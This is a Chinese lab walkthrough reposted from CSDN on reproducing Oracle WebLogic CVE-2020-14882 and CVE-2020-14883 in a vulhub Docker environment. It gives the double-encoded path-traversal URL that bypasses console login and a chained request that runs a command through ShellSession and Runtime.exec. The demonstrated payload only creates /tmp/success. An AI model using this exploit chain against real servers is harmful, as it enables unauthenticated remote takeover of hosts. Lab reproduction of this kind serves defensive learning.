自学内容网 自学内容网
自学内容网 > 正文

weblogic CVE-2020-14882 靶场攻略

🕗 发布于 2024-09-20 21:33 weblogic  java  

漏洞描述

32 CVE-2020-14882 允许远程⽤户绕过管理员控制台组件中的身份验证。
CVE-2020-14883 允许经过身份验证的⽤户在管理员控制台组件上执⾏任何命令。
使⽤这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执⾏任意命令并完全控制主机

影响版本

Oracle Weblogic Server 10.3.6.0
Oracle Weblogic Server 12.1.3.0
Oracle Weblogic Server 12.2.1.3
Oracle Weblogic Server 12.2.1.4
Oracle Weblogic Server 14.1.1.0

环境搭建

cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d

漏洞复现

1.访问管理控制台

http://172.16.1.78:7001/console/login/LoginForm.jsp

2.使⽤以下url绕过登录认证

http://172.16.1.78:7001 /console/css/%252e%252e%252fconsole.portal
此时达到未授权得效果。还未能GetShell。可以利⽤第⼆个漏洞(CVE-2020-14883),远程加载XML⽂件拿到Shell

3.⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令

http://172.16.1.78:7001/ console/css/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")
我们进⼊到docker中可以看到命令已经成功运⾏了

原文地址:https://blog.csdn.net/shw_yzh/article/details/142392776

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!

相关文章

  • 数据结构之存储位置

    内存泄漏:如果没有适时释放被动态分配的内存,会导致内存泄露问题。未释放的内存一直占用系统资源,使得系统变慢并最终导致崩溃。内存释放,合理设计算法,避免算法问题导致的内存无线增长,合理设置作用域。这个数

    阅读更多2024-09-22
  • gdb调试使用记录

    使用 GDB(GNU Debugger)进行问题排查是非常有效的。且可以通过core文件进行排查bug,core文件是程序异常崩溃的时候(段错误,非法指令等),系统自动生成的core文件。用户可以通过

    阅读更多2024-09-22
  • Docker笔记-Docker Dockerfile

    Docker笔记-Docker Dockerfile

    阅读更多2024-09-22
  • Linux学习day02

    动态库恰好相反,在编译链接的时候并没有把库文件的代码加入到可执行文件中,而是程序执行的狮虎由运行时链接文件加载库,这样可以节省系统的开支。动态库的后缀一般都是.so,像前边所提到的libc.so.6就

    阅读更多2024-09-22
  • Docker镜像和容器

    通过以上步骤,你就成功在 Docker 中搭建了一个 Ubuntu 20.04 的环境,并在其中安装了gcc以及运行了uptime命令。这种方法对于快速测试和开发非常有效。当你在 Docker 容器中

    阅读更多2024-09-22
  • 基于java&ssm课程实验教学系统设计

    经过用户登录后,页面跳转至后台首页,main.php,首页是由2个页面组成的,包括top、left和center等页面,通过@ Register引入,这里也是浏览者操作系统功能的入口,系统首页主要介绍

    阅读更多2024-09-22
  • AI健身之俯卧撑计数和姿态矫正-角度估计

    AI健身之俯卧撑计数和姿态矫正-角度估计

    阅读更多2024-09-22
  • 漏洞复现_永恒之蓝

    永恒之蓝(EternalBlue)是一个影响Windows操作系统的远程代码执行漏洞,编号为CVE-2017-0144,最初由美国国家安全局(NSA)开发并利用,后来被黑客组织Shadow Broke

    阅读更多2024-09-22
  • #define定义

    我们直接上例子理解这个地方的宏类似于函数,但是又不同于函数(后面会解释)cal(a)就是 4*4=16没问题但是为啥cal(b)就等于23呢?#define无论是定义常量还是宏,都是预处理的时候直接替

    阅读更多2024-09-22
  • ArcGIS核密度分析(栅格处理范围与掩膜分析)

    ​很多时候我们在进行栅格分析的时候,处理的结果不能完全覆盖我们需要的范围。比如,我们对点数据进行密度分析、栅格插值等。比如下图​为什么会如此呢?那是因为在做这个密度分析或者栅格插值的时候,默认是以点的

    阅读更多2024-09-22
自学内容网
Copyright © 2015-2024